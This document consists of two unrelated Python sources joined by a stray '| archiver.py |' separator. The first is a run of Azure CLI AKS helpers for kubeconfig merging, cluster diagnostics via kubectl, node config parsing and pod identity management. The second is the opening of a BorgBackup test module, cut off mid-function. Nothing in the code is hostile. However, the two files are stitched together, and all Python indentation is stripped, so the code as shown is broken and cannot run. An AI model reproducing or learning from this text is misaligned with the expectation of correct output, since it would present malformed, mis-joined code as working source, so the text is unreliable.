def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
return config_object
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
def _is_pod_identity_addon_enabled(instance):
if not instance:
return False
if not instance.pod_identity_profile:
return False
return bool(instance.pod_identity_profile.enabled)
def _ensure_pod_identity_addon_is_enabled(instance):
if not _is_pod_identity_addon_enabled(instance):
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _ensure_pod_identity_kubenet_consent(network_profile, pod_identity_profile, customer_consent):
if not network_profile or not network_profile.network_plugin:
# invalid data
return
if network_profile.network_plugin.lower() != 'kubenet':
# not kubenet, no need to check
return
if customer_consent is None:
# no set this time, read from previous value
customer_consent = bool(
pod_identity_profile.allow_network_plugin_kubenet)
if not customer_consent:
raise CLIError(
'--enable-pod-identity-with-kubenet is required for enabling pod identity addon when using Kubenet network plugin')
pod_identity_profile.allow_network_plugin_kubenet = True
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None, allow_kubenet_consent=None):
if not enable:
# when disable, remove previous saved value
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=False)
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=enable,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
_ensure_pod_identity_kubenet_consent(
instance.network_profile, instance.pod_identity_profile, allow_kubenet_consent)
instance.pod_identity_profile.enabled = enable
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
cluster_identity_object_id = None
if instance.identity.type.lower() == 'userassigned':
for identity in instance.identity.user_assigned_identities.values():
cluster_identity_object_id = identity.principal_id
break
elif instance.identity.type.lower() == 'systemassigned':
cluster_identity_object_id = instance.identity.principal_id
else:
raise CLIError('unsupported identity type: {}'.format(
instance.identity.type))
if cluster_identity_object_id is None:
raise CLIError('unable to resolve cluster identity')
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission for cluster')
# need more time to propogate this assignment...
print()
print('Wait 30 seconds for identity role assignment propagation.')
time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
)
# send the managed cluster represeentation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError('Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
|
archiver.py | import argparse
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timezone
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
try:
import llfuse
except ImportError:
pass
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota, PURE_PYTHON_MSGPACK_WARNING
from ..cache import Cache, LocalCache
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, has_llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
if fork:
try:
if exe is None:
borg = (sys.executable, '-m', 'borg.archiver')
elif isinstance(exe, str):
borg = (exe, )
elif not isinstance(exe, tuple):
raise ValueError('exe must be None, a tuple or a str')
output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
ret = 0
except subprocess.CalledProcessError as e:
output = e.output
ret = e.returncode
except SystemExit as e: # possibly raised by argparse
output = ''
ret = e.code
if binary_output:
return ret, output
else:
return ret, os.fsdecode(output)
else:
stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
try:
sys.stdin = StringIO(input.decode())
sys.stdin.buffer = BytesIO(input)
output = BytesIO()
# Always use utf-8 here, to simply .decode() below
output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
if archiver is None:
archiver = Archiver()
archiver.prerun_checks = lambda *args: None
archiver.exit_code = EXIT_SUCCESS
helpers.exit_code = EXIT_SUCCESS
try:
args = archiver.parse_args(list(args))
# argparse parsing may raise SystemExit when the command line is bad or
# actions that abort early (eg. --help) where given. Catch this and return
# the error code as-if we invoked a Borg binary.
except SystemExit as e:
output_text.flush()
return e.code, output.getvalue() if binary_output else output.getvalue().decode()
ret = archiver.run(args)
output_text.flush()
return ret, output.getvalue() if binary_output else output.getvalue().decode()
finally:
sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
def have_gnutar():
if not shutil.which('tar'):
return False
popen = subprocess.Popen(['tar', '--version'], stdout=subprocess.PIPE)
stdout, stderr = popen.communicate()
return b'GNU tar' in stdout
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
try:
exec_cmd('help', exe='borg.exe', fork=True)
BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
BORG_EXES = ['python', ]
@pytest.fixture(params=BORG_EXES)
def cmd(request):
if request.param == 'python':
exe = None
elif request.param == 'binary':
exe = 'borg.exe'
else:
raise ValueError("param must be 'python' or 'binary'")
def exec_fn(*args, **kw):
return exec_cmd(*args, exe=exe, fork=True, **kw)
return exec_fn
def test_return_codes(cmd, tmpdir):
repo = tmpdir.mkdir('repo')
input = tmpdir.mkdir('input')
output = tmpdir.mkdir('output')
input.join('test_file').write('content')
rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
assert rc == EXIT_SUCCESS
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_SUCCESS
with changedir(str(output)):
rc, out = cmd('extract', '%s::archive' % repo)
assert rc == EXIT_SUCCESS
rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
assert rc == EXIT_WARNING # pattern did not match
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_ERROR # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
DF_MOUNT = '/tmp/borg-mount'
@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
def make_files(dir, count, size, rnd=True):
shutil.rmtree(dir, ignore_errors=True)
os.mkdir(dir)
if rnd:
count = random.randint(1, count)
if size > 1:
size = random.randint(1, size)
for i in range(count):
fn = os.path.join(dir, "file%03d" % i)
with open(fn, 'wb') as f:
data = os.urandom(size)
f.write(data)
with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
mount = DF_MOUNT
assert os.path.exists(mount)
repo = os.path.join(mount, 'repo')
input = os.path.join(mount, 'input')
reserve = os.path.join(mount, 'reserve')
for j in range(100):
shutil.rmtree(repo, ignore_errors=True)
shutil.rmtree(input, ignore_errors=True)
# keep some space and some inodes in reserve that we can free up later:
make_files(reserve, 80, 100000, rnd=False)
rc, out = cmd('init', repo)
if rc != EXIT_SUCCESS:
print('init', rc, out)
assert rc == EXIT_SUCCESS
try:
success, i = True, 0
while success:
i += 1
try:
make_files(input, 20, 200000)
except OSError as err:
